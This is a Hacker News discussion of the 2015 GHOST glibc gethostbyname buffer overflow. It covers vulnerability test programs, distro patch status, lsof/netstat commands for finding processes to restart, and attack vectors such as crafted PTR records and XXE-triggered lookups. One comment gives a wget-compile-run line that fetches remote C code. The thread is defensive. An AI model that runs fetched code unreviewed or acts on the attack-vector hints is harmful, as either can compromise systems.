Hacker News new | past | comments | ask | show | jobs | submit login
CVE-2015-0235 – GHOST: glibc gethostbyname buffer overflow (openwall.com)
531 points by martius on Jan 27, 2015 | hide | past | favorite | 241 comments



Here is the test program, from http://www.openwall.com/lists/oss-security/2015/01/27/9

https://gist.github.com/koelling/ef9b2b9d0be6d6dbab63

To test your system, simply run this (but obviously only after making sure gistfile1.c is clean ;))

    wget https://gist.githubusercontent.com/koelling/ef9b2b9d0be6d6dbab63/raw/de1730049198c64eaf8f8ab015a3c8b23b63fd34/gistfile1.c
    gcc gistfile1.c -o CVE-2015-0235
    ./CVE-2015-0235


I always laugh when people give you a URL to C code to test for remote code execution...


Why?

Reproducers are standard fare and it's not like the code in this case is obfuscated. Are magic code goblins going to come and invoke Ken Thompson's untrustable computing and make your computer install windows and join a botnet or something?


Because if you give someone a URL to C code and they run it, you have effective gotten them to remotely execute your code ;-)


You're piping random executables from the internet without even looking at them to see what they do if you run that command.


There's no pipe involved in the GPs posting. It downloads a source file and the post even points out to check the file before compiling. I actually copied and pasted the test code from the original advisory. Should I have typed it in with my own bare fingers to be more secure? I agree with your sentiment in general, you just picked the wrong example to bash here.


I was responding to the later posts who were confused as to why someone would laugh at seeing that. You're right that you said to check and I wasn't trying to bash that post at all.

That aside, I actually did type it into my disposable VM. The theory being that if there was something subtle, it would force me either to type it wrong and not be exploited due to cognitive blindness or I'd catch the problem and avoid it.

I've read too many IOCC entries and I probably am a bit paranoid.


The average Linux IT guy will not read the C code. Many of them wouldn't be able to really understand what it does either. And this is best case code is simple and easy to grok.


If you're not reading the code you can just as well curl-and-pipe it. However, we run so much code on our computers that is trusted-by-association (oh, that's from apache.org, that's probably safe!) that it probably does not matter anyways.


    > You're piping random executables from the internet
    > without even looking at them to see what they do if you
    > run that command
... and then in your profile:

    > Just another Perl hacker.
You audit every CPAN module you install, line by line, right?


I agree, it is funny, but we run code we can't even see all day long. This is only 38 LOC. Anyone who is going to run it, however, should make sure they understand it.


You know you can also read the source code right? Even if you are not proficient with c you can understand what it's doing.


As opposed to code in some other language?


Might as well throw a --no-check-certificate in there


Anyone know how reliable that test is? I've got a system reporting not vulnerable but I'm not sure what glibc it has.


glibc 2.18 and greater were already patched, but it wasn't recognized as an RCE vulnerability at the time. See the first bullet under the "Mitigating factors" section in the link.

You can check your libc version with:

  ldd --version


I've got a system reporting glibc 2.11, but the test reports 'not vulnerable'.


We have already started to patch servers at Cloudways. Our CTO Pere Hospital explains how: http://www.cloudways.com/blog/ghost-vulnerability-patching/


All due respect, I think "explains that" would be more accurate than "explains how" here


True that Dampier. I wish I could edit it :(


Qualys Security Advisory: http://www.openwall.com/lists/oss-security/2015/01/27/9

Lots of info about their discovery. Apparently they developed a PoC exploit. They've also included a pretty short test program to determine if a system is vulnerable or not.

Here's a gist of the test (copied from their advisory): https://gist.github.com/amlweems/6e78d03810548b4867d6


    - At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit
      machines, and 8 bytes on 64-bit machines). Bytes can be overwritten
      only with digits ('0'...'9'), dots ('.'), and a terminating null
      character ('\0').

    - Despite these limitations, arbitrary code execution can be achieved.
      As a proof of concept, we developed a full-fledged remote exploit
      against the Exim mail server, bypassing all existing protections
      (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will
      publish our exploit as a Metasploit module in the near future.
Wow, that's actually amazing! I never would have thought it possible. As tonyhb says, it will be really interesting 'in the near future' to see how they managed to do it.


Does this mean it currently is only a problem for mail servers?


That's a great writeup. It will be really interesting to see how they achieve remote code execution under those limitations.

Also surprising to note that we've been vulnerable since November 2000.


They give it away (which I find moderately not nice of them) by saying they used Exim (the mail server) in their POC.


The default exim config seems to not be vulnerable.

I checked the configs on two of my systems, one default, and one heavily customized, neither had the helo verification turned on.


When the patches are available, you need to update, and likely reboot. Mattias Geniar talks about using the following command to find processes depending on libc, any of which could be running the vulnerable code, these are core processes that you probably cannot just cycle without a reboot [1]. For me the listing looks something like this: agetty, auditd, dbus-daem, dhclient, init, master, mysqld, rsyslogd, sshd, udevd, xinetd. Many of these deal with hostnames, so I would want to be sure everything is clean, and the best option is likely a reboot.

  lsof | grep libc | awk '{print $1}' | sort | uniq
[1] http://ma.ttias.be/critical-glibc-update-cve-2015-0235-getho...


They're only attacking host-lookup, so you just have to worry about people who can connect to your service and are able to control name server response. This means your network services that are internet-accessible. Everything else can wait for a maintenance window for the reboot.

  ~# netstat -lnp | grep -e "\(tcp.*LISTEN\|udp\)" | cut -d / -f 2- | sort -u
  cupsd          
  dnsmasq        
  httpd          
  nmbd           
  ntpd           
  qemu-kvm       
  rpc.portmap    
  rpc.statd      
  sendmail: acce 
  smbd           
  ssh           
  sshd


It doesn't have to be internet accessible, AFAIK. If an attacker can get something to do arbitrary DNS lookups, I think it can be attacked. For instance, monitoring/log correlation software might be vulnerable.


If you have backend systems parsing XML, then an XXE[1] attack could trigger a DNS lookup, for example.

[1]https://www.owasp.org/index.php/XML_External_Entity_%28XXE%2...


Ooh, that could lead to some very interesting attack vectors. :D


sudo netstat -lnp | awk -F/ '/LISTEN /{print $2}'


For immediate actions, maybe also set 'UseDNS no' in /etc/ssh/sshd_config and restart any public-facing ssh servers.


This is a good idea in general. However, every version of ssh that I could test (going back to Ubuntu 8.04) uses getaddrinfo() rather than gethostbyname() and is therefore safe.


... or not necessarily safe, as people here claim that getaddrinfo() uses gethostbyname() under the covers.

"UseDNS no" in your sshd_config is a good idea in general.


Just remember that by default lsof prints only first 9 characters of process name, so processes with long names will be cut. You can change how much initial characters lsof prints with +c command, but often kernel does not supply full names for lsof, example limit in my box is 15 characters

>lsof +c 64

lsof: +c 64 > what system provides (15)

So

lsof +c 15 is maximum


That limit is set somewhere in the kernel but it's not clear if lsof is just setting that as a maximum internally or probing somewhere - I used strace -etrace='!close' lsof +c 64 but I couldn't see anything related to the limit.


Thank you, it's not always clear when a reboot is needed after an update. I do it with kernel updates but wouldn't have in this case until I read your comment and ran the command to check.

If would be nice if package managers would let us know when this is necessary, I expect that might be a hard thing to get right though.


You can check to see if any running process are using any stale libraries pretty easily:

sudo lsof | grep lib | grep DEL

You can then either reload those processes manually, or just bounce the box if that's easier.


There's also a rare chance that a program is statically linked, in which case upgrading glibc won't help, the program would need to be recompiled.


Yeah, that's a good point, and definitely worth mentioning, but obviously rebooting isn't going to help in that case either. The parent was asking about how they would know if they need to reboot or not.


It is nearly impossible to statically link glibc.


... with nss-modules being a major culprit, ironically... (on which gethostbyname relies greatly)...


[deleted]


You're testing what happens when you delete a file for which an open file descriptor exists. On Linux, a shared library will normally be memory-mapped but will not have a corresponding file descriptor. So lsof will show DEL, not (deleted).

I wouldn't normally nitpick about something like this, but if people follow your advice they might incorrectly think they don't need to reboot.


You can see that the removed file gets a (deleted) in the 'NAME' column but not DEL in the 'TYPE'.

Maybe you have a cut-and-paste error? The before and after look the same to me, no "(deleted)" to be seen.


Use contrl-F to search, it got clipped off the right-hand side by HN's raw-mode display.


For debian, you can use "checkrestart -v" from the "debian-goodies" package.


lsof | awk '/libc/{print $1 | "sort -u" }' you're welcome


This is the original report: https://sourceware.org/bugzilla/show_bug.cgi?id=15014

Upstream patch: https://sourceware.org/git/?p=glibc.git;a=commit;h=d5dd6189d... Full diff: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5dd6...

Red Hat bug: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0235

Debian bug: https://bugs.debian.org/776391

Great write-up from the discoverer (Qualys): http://www.openwall.com/lists/oss-security/2015/01/27/9 - thanks amlweems! (https://news.ycombinator.com/item?id=8954069)

It looks like when an application calls a function of the gethostbyname()/gethostbyname_r() family but passes a buffer and a buffer length that is too short to store the result, then the function sometimes fails to detect there is not enough space due to a miscalculation of how much space it needs, leading to a heap overflow. This means potentially arbitrary code execution! Edit: Both the reentrant version (gethostbyname_r) and non-reentrant one (gethostbyname) are affected (the non-reentrant one uses a fixed buffer length). The scope of this vulnerability is huge! A lot of server applications attempt to resolve or reverse-resolve network clients's hostnames or IP addresses when a connection is established, so they would all be potentially vulnerable: the malicious client controlling his DNS records simply needs to return specially crafted hostname or address data that is too big to fit in the buffer. And this affects everything, no matter what language the server application is written in: C, Python, PHP, Java...

Edit #2: it looks like the bug was patched 2 years ago, but the fact it was exploitable was not understood until today, hence why a CVE was only assigned now.

Edit #3: Apps written in Golang are not vulnerable: https://news.ycombinator.com/item?id=8954011 - thanks 4ad!


A note about Go. Go has its own DNS resolver, but unfortunately, if you compile natively, it's not enabled by default. It's only enabled if you cross-compile, or if you disable cgo, or if you rebuild the standard library with -tags netgo.

/edit: a second note about Go; even without the native resolver, Go uses getaddrinfo, not gethostbyname*, and it's not vulnerable.


So.... an application acts differently if it is cross-compiled? And if there's a vuln in the go resolver, binaries are "maybe" vulnerable, depending on whether they were cross-compiled or not?


I'm not sure why you were downvoted. In an ideal world, the behavior of the native Go resolver and the host resolver should be the same, but in the real world they might behave differently and might have different bugs. The nice thing about the native Go resolver is that it's written in a memory safe language which prohibits bugs like these.


The upstream patch is dated "Mon, 21 Jan 2013". Does this affect Redhat and Debian because they use older glibc versions and didn't backport this fix?


yes


What versions are affected? E.g. Ubuntu 14.04 appears to be on 2.19-0ubuntu6.5 (just updated). Does that include the fix?


You can check the libc version with:

dpkg -s libc6

For my Debian 7 servers it reports "Version: 2.13-38+deb7u7" after upgrading. Everything below that (eg. "*u6") is vulnerable. I don't know about the specific version numbers in Ubuntu though.

Edit: the fixed Ubuntu version is "2.15-0ubuntu10.10"


Per the Ubuntu security advisory for this, 14.04 is not impacted.


Full blog post coming, but 14.04 was never vulnerable. glibc 2.17 was the last vulnerable version.


The scope of this vulnerability is huge! A lot of server applications attempt to resolve or reverse-resolve network clients's hostnames or IP addresses when a connection is established, so they would all be potentially vulnerable: the malicious client controlling his DNS records simply needs to return specially crafted hostname or address data that is too big to fit in the buffer.

This overstates things a bit - hostnames that can be returned by the reverse DNS resolver can't trigger the vulnerability (maximum label length of 63). It needs to be a hostname supplied by a non-DNS method (eg. the POC uses the HELO SMTP command).


> And this affects everything, no matter what language the server application is written in: C, Python, Golang, PHP, Java...

Assuming the runtime links to glibc, which unfortunately most do.


From https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0235

"A heap-based buffer overflow was found in __nss_hostname_digits_dots(), which is used by the gethostbyname() and gethostbyname2() glibc function call. A remote attacker could use this flaw to execute arbitary code with the permissions of the user running the application."


Obligatory git link for the curious: https://sourceware.org/git/?p=glibc.git;a=blob;f=nss/digits_....

Note that this is a HEAD link, so if there are changes after I post this they should appear. I don't claim to have spotted the suspicious code (it's not ... super-accessible), just wanted to provide a link to the file in question.


I'm not fully though my morning bootup process and so not really ready to grok this but, can anyone give a quick summary of why gethostbyname() needs to hit the heap at all, let alone with a realloc call? There's a maximum hostname length, and it's not huge. Also: isn't this function just saying "yes" or "no" to a candidate hostname? Can't it just say "no" if the hostname is super long?


From the GNU coding standards:

> Avoid arbitrary limits on the length or number of any data structure, including file names, lines, files, and symbols, by allocating all data structures dynamically.


http://en.wikipedia.org/wiki/Hostname#Restrictions_on_valid_...

the entire hostname (including the delimiting dots but not a trailing dot) has a maximum of 253 ASCII characters

In general that is a good guideline, but when the standard (RFC1035) says there is an absolute limit, there is little value in going above that as it is likely that other systems won't be able to handle it. The added complexity of dynamic allocation is also an opportunity for bugs, like this one.


I think he's making fun of that glibc principle.

Again, this is especially silly if (as it appears to first glance) the bug is in a hostname validation function, and so flexible allocation could only ever be useful in the case of a hostname that must fail validation anyways.


In this case the bug isn't caused by dynamic allocation though, is it? The problem is the validation logic for detecting if the caller didn't allocate a big enough buffer when making the call.

In fact, it looks like if you get to the dynamic allocation section, it will fix the problem. One could argue that the whole problem stems from having a bug in a complex computation of buffer size to handle lots of different bits of data, rather than dynamically allocating the individual bits as needed.


gethostbyname() and friends fill in struct hostent:

  struct hostent {
        char  *h_name;            /* official name of host */
        char **h_aliases;         /* alias list */
        int    h_addrtype;        /* host address type */
        int    h_length;          /* length of address */
        char **h_addr_list;       /* list of addresses */
  }
The pointers in the structure point into the buffer. There could be any number of host aliases or IP addresses.


That's true and a good point, but not (it seems) applicable to this particular function, which validates whether or not the name is one of two fixed-sized formats, right?

(edit) You may be totally right here, by the way.


It looks like what's going on is that gethostbyname() calls __nss_hostname_digits_dots() which checks to see if the string you passed it was an IPv4 or IPv6 address rather than a name, and in that case it functions like inet_aton/inet_pton and converts the IP address string to a binary IP address as though the "name" 1.2.3.4 resolved to IP address 1.2.3.4.

In that specific case there are no aliases and exactly one IP address, but the buffer could still be too small (e.g. if caller-supplied with gethostbyname_r()).


[deleted]


Right, but they only need to do that computation because they're dynamically allocating storage. But the maximum size of a hostname is so small that hitting the allocator is costing them more than static allocation would.


All those home routers. All those home routers running Linux. All those home routers that are difficult to upgrade. All those home routers that will soon be part of some botnet or other?


Those (Linux-based) home routers usually use uclibc, which is not glibc.

Similarly, they usually use busybox ash as a shell and thus weren't vulnerable to shellshock.

Some do use openssl, so might still be affected by heartbleed.


Good point! Hooray for avoidance of software monocultures.

On the other hand, I shall now work hard to stop worrying about undiscovered vulnerabilities in uclibc.


But it is still C code, so...


If they aren't already a part of a botnet.


This looks like an "accident" by PR Agency:

http://www.frsag.org/pipermail/frsag/2015-January/005722.htm... From: Mar 27 Jan 15:28:45 CET 2015

Half an hour after Redhat lifted embargo from the ticket: https://bugzilla.redhat.com/show_activity.cgi?id=1183461 2015-01-27 10:03:14 EST Removed: EMBARGOED CVE-2015-0235

If this is true this lady gets an award for best security disclosure this year ;-)



Looks like that function is marked as obsolete, anyone know how long that's been the case?

https://www.mankier.com/3/gethostbyname

"The gethostbyname(), gethostbyaddr(), herror(), and hstrerror() functions are obsolete. Applications should use getaddrinfo(3), getnameinfo(3), and gai_strerror(3) instead."


For a long time: getaddrinfo() and others are specified in susv3[1] (since 2003 I think). However, gethostbyname() and gethostbyaddr() are still very commonly used, and won't be gone soon.

1/ http://refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB...


The main reason gethostbyname is deprecated is that it doesn't support IPv6. The implementation of getaddrinfo uses gethostbyname, so you're using it either way.


Well, Ulrich Drepper has been trying to get people to stop using it since 2007: https://udrepper.livejournal.com/16116.html

And not just because of IPv6.


That seems like a weak argument. It's still going to do the wrong thing when the local machine has a 10.x.x.x address and the local server has a 172.16.x.x address. The right solution is for the local admin to have the local DNS server return only the local address for local clients.

getaddrinfo() is also a much more complicated function than gethostbyname(). If you need the extra features, fine. If you're writing new code, fine. But going back and trying to update existing code is just going to introduce new bugs.


As a non-professional in the area of Linux security, let me share what I figured out while patching Ubuntu 12.04 servers for GHOST. In my situation at least, I got confused by looking for glibc and eglibc, which are listed as packages to be patched in http://people.canonical.com/~ubuntu-security/cve/2015/CVE-20....

I wanted to know what version of glibc and eglibc my servers were running so that I could check that they were getting updated. Running

   dpkg -s glibc 
and

   dpkg -s eglibc 
turned up nothing. How could that be since there had to be a C library?!

Answer: there are indeed compiled C libraries on my servers. I found that the key packages to update were related to libc6 (http://packages.ubuntu.com/precise/libc6), which were compiled from eglibc.

At any rate, I patched my servers with a typical procedure:

    sudo apt-get update 
    sudo unattended-upgrades
BTW, it helped me to understand that Ubuntu 12.04 uses eglibc and not glibc: http://askubuntu.com/questions/372864/why-ubuntu-uses-eglibc... to make sense of the charts at http://people.canonical.com/~ubuntu-security/cve/2015/CVE-20..., especially the reason for the "DNE" (does not exist?) for Ubuntu 12.04 and glibc.

Hope this is clarifying to someone out there. Would love to hear confirmation or refutation of my reasoning here.


FYI, if you want to identify which package shipped a particular file:

    $ dpkg -S /lib/x86_64-linux-gnu/libc.so.6 
    libc6:amd64: /lib/x86_64-linux-gnu/libc.so.6
Hence 'libc6' is the package as you figured out.

If you want to see the status of a particular vulnerability in Debian, you can use the Security Tracker: https://security-tracker.debian.org/tracker/CVE-2015-0235 which links to the security advisory and tells you that the bug was fixed in version 2.13-38+deb7u7 of the package.

Note that any programs running before you upgraded the library will need to be restarted in order to use the fixed version. There's a program called checkrestart that will tell you which programs need to be restarted, or you can play it safe and reboot your system after applying library updates.


thanks especially for the tip about restarting the system, just in case.


Here is the full Qualys report with an in-depth analysis:

http://www.openwall.com/lists/oss-security/2015/01/27/9

Also contains a writeup about a remote Exim exploit (which is the default mail server on at least Debian).


    101       *buffer_size = size_needed;
    102       new_buf = (char *) realloc (*buffer, *buffer_size);
    103
    104       if (new_buf == NULL)
    105         {
    ...
    114           goto done;
    115         }
It's a shame they put that "..." there, because this looked like another potential vulnerability to me, or at least something I would take very critically reading this code. (realloc fails, the caller's variable at buffer_size still gets assigned a larger value, next call thinks it has a larger buffer than it does). Line 110 assigns *buffer_size back to 0 so there is no such problem.


From this, the vulnerability was fixed in May 2013 so any systems from there or later (e.g. Ubuntu 14.04) are fine. Older systems obviously now need to wait for the patches to come through.


If you are looking for date-based checking[1], August 2013 is when glibc 2.18 was released.[2]

[1] I wouldn't.

[2] http://ftp.gnu.org/gnu/glibc/


Most importantly, it contains a test program at the beginning of section 4.



Yes, the mail you link says:

"I will keep you posted in next hours. I send the notice to early. Big fail of my own. Stay tuned."


As far as I can tell, sshd has always used getaddrinfo() which is not vulnerable (rather than gethostbyname() which is). Can anyone confirm?

According to this comment: https://news.ycombinator.com/item?id=8954458 , getaddrinfo() uses gethostbyname() internally. So, is a default 'UseDNS yes' ssh setup vulnerable or not?


Even if it used gethostbyname() , I fail to understand how one would supply an invalid IP address to an sshd program? It calls an IP resolver after the TCP connection has been established, reading off the IP from there. From what I understood from their exim HELO example, one has to feed in a crazy IP "address" to gethostbyname() to trigger the bug.


Well, it obviously does getaddrinfo() on the incoming TCP connection to get the hostname (which is reported in the log, unless you have a 'UseDNS no' directive) -- and at least in my setup (which is mostly vanilla Debian), it seems to resolve that name again to an IP address, compare that to the IP address of the connection, and warn if it does not match.

Thus, an attacker controlling the PTR record for a given IP might provide a GHOST-compliant name in that PTR record; Then, connect to the ssh daemon, wait for it to read the PTR record - and if it gethostbyname() on it, it's game over.

Quite a few log processors would do that. The reason I'm worried specifically about sshd is that it is usually the only port ever listening to the world-and-not-firewalled on my servers (and a non-standard, at that - and only allowing public key authentication) - but despite this generally-regarded-as-secure setting, GHOST may prove it vulnerable.


But why would this malicious PTR record be fed into gethostbyname() again? At that point of getting a reverse lookup result, sshd is done checking.


To see that it resolves back to the IP address from which the connection is made. It's a standard check that many servers do, and ssh does too (and gives off a warning if they don't match). I'm not sure if it does it in a way that's vulnerable or not, though - but it surely does so by default.

From man sshd_config:

     UseDNS  Specifies whether sshd(8) should look up the
     remote host name and check that the resolved host name
     for the remote IP address maps back to the very same 
     IP address.  The default is “yes”.


Looks like this was still supposed to be embargoed. I feel sorry for the maintainers who now have to deal with this getting leaked...


RedHat has a fix for 6 and 7 now: https://rhn.redhat.com/errata/RHSA-2015-0092.html


Does anyone have any insight into when we'll see CentOS packages start hitting the mirrors?


Packages are ready, but if your mirror don't have them, use manual way: http://systemz.pl/post/fast-ghost-fix-for-cve-2015-0235/ It's for CentOS 6



They are now available, on CentOS 6.4 yum update glibc installs glibc-2.12-1.149.el6_6.5

changelog: * Mon Jan 19 2015 Siddhesh Poyarekar <siddhesh@redhat.com> - 2.12-1.149.5 - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183533).

Qualys GHOST program returns "not vulnerable" after the upgrade.


I just updated this on a CentOS 6 box, and it broke the server. After I rebooted, it never came online. Luckily it was a backup server, so it's not critical. Right now I'm just waiting for the customer to contact iweb to figure out what went wrong. This is a vanilla server with just some of my software installed (which couldn't possibly have prevented the server from rebooting).

Obviously there is some dependency that they forgot to add, so I would hold off on updating anything unless you don't really care if the server is offline for a while.


The problem was the iweb smart layer - they just needed to recreate the smart layer.


Apparently packages are built but currently awaiting signing + release. Hopefully within an hour or two they should hit the mirrors.


[deleted]


This is for https://rhn.redhat.com/errata/RHSA-2015-0016.html

This was related to iconv() and UTF8.

This is NOT the fix for this CVE.


That release seems to be dated 7 January 2015.


    Here is a list of potential targets that we investigated (they all call
    gethostbyname, one way or another), but to the best of our knowledge,
    the buffer overflow cannot be triggered in any of them:
    
    apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
    nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
    pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
    vsftpd, xinetd.
See "Re: Qualys Security Advisory CVE-2015-0235 - GHOST: glibc gethostbyname buffer overflow" <http://seclists.org/oss-sec/2015/q1/283>.


nginx on most supporting platforms (`NGX_HAVE_GETADDRINFO && NGX_HAVE_INET6`) uses `getaddrinfo(3)`.


Details on this one appear to be quite sparse - under what use cases would a remote user be able to craft invalid IP addresses?


It seems it was made public by accident, so it is not totally surprising that information is sparse :(


Given that I recently received a Debian Security Advisory which specifically addressed this CVE, I don't think it was accidental at all.


I think the timing was accidental due to leaking. The coordinated release became uncoordinated.


The embargo was cancelled half an hour after the leak.


I'm guessing vulnerable cases will be where string-encoded IP addresses are accepted from the network and passed directly to these functions, such as by web apps or things that take string-serialized encodings. This would allow an attacker to pass any string in as an IP address.


I'm curious on this one too. How exactly can this be exploited remotely? SSH trickery? If a PHP script is doing geolookups or resolving of user's IP's to hosts?

How do I make my hosts secure?


The example given in the article is an MTA, but I'm there there's others.


We wrote a quick blog post on this. The main meaningful feature is a table of distros, versions, and whether they're not vulnerable, vulnerable but with a patch, or vulnerable with no patch yet. I am accepting requests for other distros, and of course if you have any corrections I'd love to hear them!

http://chargen.matasano.com/chargen/2015/1/27/vulnerability-...


So what I figured out so far: This is a quite nasty bug that may or may not affect everything that links against glibc (or eglibc). However the bug was fixed in glibc 2.18 and the advisory [1] includes a test program at the start of section 4. From this Ubuntu 10.04 LTS and 12.04 LTS are affected, but not 14.04 LTS. ( Can someone confirm this?)

[1] http://www.openwall.com/lists/oss-security/2015/01/27/9


14.04 and 13.10 are not vulnerable


Here is a diff removing the vulnerability: https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=nss/dig...


Is Ubuntu 12.04 vulnerable to this?

>> this vulnerability affects many systems from Linux glibc-2.2 version published on 10 November 2000.

>> a fixed was pushed to glibc-2.17 et glibc-2.18

Ran dpkg -l libc6 on 12.04.5 shows it's 2.15. So anything before 2.17?

/lib/x86_64-linux-gnu/libc.so.6 GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.7) stable release version 2.15, by Roland McGrath et al.


According to Canonical it is: http://www.ubuntu.com/usn/usn-2485-1/


Blog post coming soon, but 12.04 is vulnerable, but has a patch available.


I'm glad the moderator removed GHOST from the subject line. CVEs don't need a media friendly handle.

Edit: Its back again. Booooo.


We disagree on that, especially when they're widespread (and you don't get much more widespread than glibc) and "drop everything and patch"-level severity.

Having a shorthand to refer to the bug makes it more easy (and therefore more likely) that it will get referenced and discussed.


Having a shorthand makes it a lot easier for people to freak out and panic unnecessarily, too. "Heartbleed" was big enough to warrant a world-wide freakout, but this is a remote buffer overflow with many requirements for success.

From http://www.openwall.com/lists/oss-security/2015/01/27/9 :

  --[ 3 - Mitigating factors ]--------------------------------------------------

  The impact of this bug is reduced significantly by the following reasons:

  - A patch already exists (since May 21, 2013), and has been applied and
  tested since glibc-2.18, released on August 12, 2013:

  - The gethostbyname*() functions are obsolete; with the advent of IPv6,
  recent applications use getaddrinfo() instead.

  - Many programs, especially SUID binaries reachable locally, use
  gethostbyname() if, and only if, a preliminary call to inet_aton()
  fails. However, a subsequent call must also succeed (the "inet-aton"
  requirement) in order to reach the overflow: this is impossible, and
  such programs are therefore safe.

  - Most of the other programs, especially servers reachable remotely, use
  gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also
  known as full-circle reverse DNS) checks. These programs are generally
  safe, because the hostname passed to gethostbyname() has normally been
  pre-validated by DNS software:

  . "a string of labels each containing up to 63 8-bit octets, separated
    by dots, and with a maximum total of 255 octets." This makes it
    impossible to satisfy the "1-KB" requirement.

  . Actually, glibc's DNS resolver can produce hostnames of up to
    (almost) 1025 characters (in case of bit-string labels, and special
    or non-printable characters). But this introduces backslashes ('\\')
    and makes it impossible to satisfy the "digits-and-dots"
    requirement.
You would effectively have to control the DNS server, or spoof its responses, to get the software to accept a suitable exploit.


>You would effectively have to control the DNS server, or spoof its responses, to get the software to accept a suitable exploit

would you? If you want to exploit something that does unauthenticated gethostbyaddr(), then yes, for that you need to control a DNS server (which, btw, isn't harder than controlling a web server to serve malware with).

On the other hand, if you can make your target call gethostbyname() on an arbitrary string, you don't need to control a DNS server.

There are many sites out there that go and fetch user supplied URLs - for example to fetch picture previews.

First you exploit one of these, install a DNS server on them and then you can also exploit the ones which only do gethostbyaddr() :-)


Web servers serving malware are exploited in drive-by scanning; find a vuln in a webapp, drop your malware. It doesn't even take exploiting the system itself, and generally does not affect the web server at all. Taking over a DNS server would take much more work to pwn first, and then require reconfiguring the DNS server. Much more difficult.

Fetching a user-supplied URL is not enough to exploit remotely. You have to exploit the target's DNS resolver, because you have to feed it invalid or impossible records. All existing DNS resolvers will reject these because they break RFC.

It would be much easier to exploit a web app and drop your payload and exploit it locally, which is what everyone currently does to pwn servers with rootkits.


I think the parent comment was sarcastic.


I wasn't being sarcastic.

Adding a tagline, media friendly name or keywords is unprofessional. Simply, severity is then ranked by how popular the press or security bloggers can market the word, not by the respective severity of the CVE. Its a popularity contest, nothing more.

As someone who deals with every damn sensationalist story at a financial company, having every fucking client phone up about every damn marketoid creation even if it doesn't affect our platform detracts from doing real work.

Let's play their trick:

Its the X Factor of security.


"Professionalism" is overrated. And this appears to be a "drop everything and fix it" bug, so the "damn sensationalism" is warranted. If clients calling you about a vulnerability bothers you, get out of this line of work, please.

People actually giving a shit about security holes is something we've been wanting for a long time. It beats the hell out of the alternative, something we've been dealing with since the 90s or so!


Professionalism is thinking and understanding before you start firing a gun at your infrastructure, testing stuff and not shooting client SLAs.

We do that bit between the CVE being announced and patching ahit, not when the press goes ape shit.

So, that's overrated is it?


Yes. When there's an exploit available now, you really don't have that luxury.


His point is that severity is orthogonal to the coolness of vulnerability names. And that this will cause whacky priorities in future.

Plus, 99% of the time, end users are not directly responsible for patching these issues. So why the focus on mass-media friendly marketing?


If the mass media is getting real life sysadmins to get bugged about security holes, how is that anything but a net positive?


That's not the point. The mass media knows nothing about security.

Here is what is happening when vulnerabilities get their own brand names, with logos and marketing:

1. Vulnerabilities are implicitly severe if they attract media attention (and only if they attract media attention). I've been featured in the press twice for vulnerabilities. Neither of them were as serious as the least serious, unpublicized vulnerability on this page: https://hackerone.com/internet.

2. It implicitly encourages rating a vulnerability's severity by how much media attention it receives, not by an objective scale.

It's causing a race to the bottom where coordinated disclosure now requires a PR firm, a presskit, a logo, and a brand name. For Heartbleed and Shellshock, sure, they're serious enough for all those hoops. For everything else, the race to the bottom will commoditize these things, making vulnerabilities without them ignored, and confusing vulnerabilities with them as severe.

The final result is that it's just extra, meaningless noise tacked on to vulnerability disclosure that makes it more difficult to achieve, involves more parties and doesn't improve anything.


I don't think so.

Between Heartbleed and Shellshock, and now this, a PR firm marketing vulnerabilities like this seems... crass.


I think it's okay to assign a media name to vulnerabilities, but only if the vulnerability is truly severe enough (easy to exploit and serious magnitude) to warrant it. Otherwise it's just an attempt at marketing and PR.

In this case, it looks the name is probably not warranted.


plus the original email was sent from a PR agency.


Debian was updated, but their website does not show it.

It's version 2.13-38+deb7u7

A standard update command should get it, but if not you can find it here:

http://security.debian.org/pool/updates/main/e/eglibc/


Here's a quick writeup I made with all of the information I found in this thread.

Feedback welcome:

http://product.reverb.com/2015/01/28/patching-cve-2015-0235-...


Good writeup, I liked the gists you picked out.

I've got some feedback though:

The bug has been fixed (May 21, 2013, between the releases of glibc-2.17 and glibc-2.18).

So your statement "This bug effects all versions of libc6 greater than 2.2+ (which was released Nov, 10, 2000) so you’ll be really lucky if you’re not vulnerable." is wrong.

For example, Ubuntu 14.04 uses glibc-2.19-1 which isn't affected.


Thanks for the feedback. I've updated the post to omit that statement since it's not entirely helpful.


Does anyone have any pointers as to an example hostname that would trigger this? I am trying to determine if one can write a signature for it.

--Conclusion: inet_aton() is the only option, and the hostname must have one of the following forms: "a.b.c.d", "a.b.c", "a.b", or "a", where a, b, c, d must be unsigned integers, at most 0xfffffffful, converted successfully (ie, no integer overflow) by strtoul() in decimal or octal (but not hexadecimal, because 'x' and 'X' are forbidden). --

So essentially, any DNS lookups of the form a.b.c.d, a.b.c, a.b, or a where a,b,c,d are all numbers, should be considered suspicious?



ALAS covering this vulnerability:

https://alas.aws.amazon.com/ALAS-2015-473.html

As usual, the Elastic Beanstalk team (with their forked yum repositories) are lagging behind on a fix.


This might be a good time to sign the promise not to use C/C++ on new projects... http://www.flourish.org/promise/


yeah by using python, you will never run into problems like this https://github.com/python/cpython/search?utf8=✓&q=gethostbyn...


According to this update: http://www.openwall.com/lists/oss-security/2015/01/27/18

The Qualys guys were unable to find any issues with sshd and tcp_wrappers. I imagine I'm not the only one that has /etc/hosts.deny setup to reject all but some IPs, but according to Qualys tests this issue cannot be triggered via someone with exploitable RDNS. As far as they know -- of course you should upgrade when you can.


Here is how you can handle with it without rebooting the whole server:

for s in $(lsof | grep libc | awk '{print $1}' | sort | uniq); do if [[ -f "/etc/init.d/$s" && "$(ps aufx | grep -v grep | grep $s)" ]]; then echo $s; service $s restart; fi; done

From: http://blog.wallarm.com/post/109402223343/ghost-a-brief-reca...


RedHat has patches out for RHEL5 only so far

https://rhn.redhat.com/errata/RHSA-2015-0090.html



The Qualys security advisory says that it was fixed independently in 2013, so RHEL6 and 7 might already have the fix.

http://www.openwall.com/lists/oss-security/2015/01/27/9


